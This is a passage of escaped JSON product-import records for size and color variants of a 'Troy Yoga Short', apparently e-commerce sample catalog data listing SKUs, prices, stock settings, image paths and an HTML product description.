onfigurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"932\":{\"sku\":\"MSH09-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-32-Green\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"933\":{\"sku\":\"MSH09-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-33-Black\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"934\":{\"sku\":\"MSH09-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-33-Blue\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"935\":{\"sku\":\"MSH09-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-33-Green\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"936\":{\"sku\":\"MSH09-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-34-Black\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"937\":{\"sku\":\"MSH09-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-34-Blue\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"938\":{\"sku\":\"MSH09-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-34-Green\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"939\":{\"sku\":\"MSH09-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-36-Black\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"940\":{\"sku\":\"MSH09-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-36-Blue\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 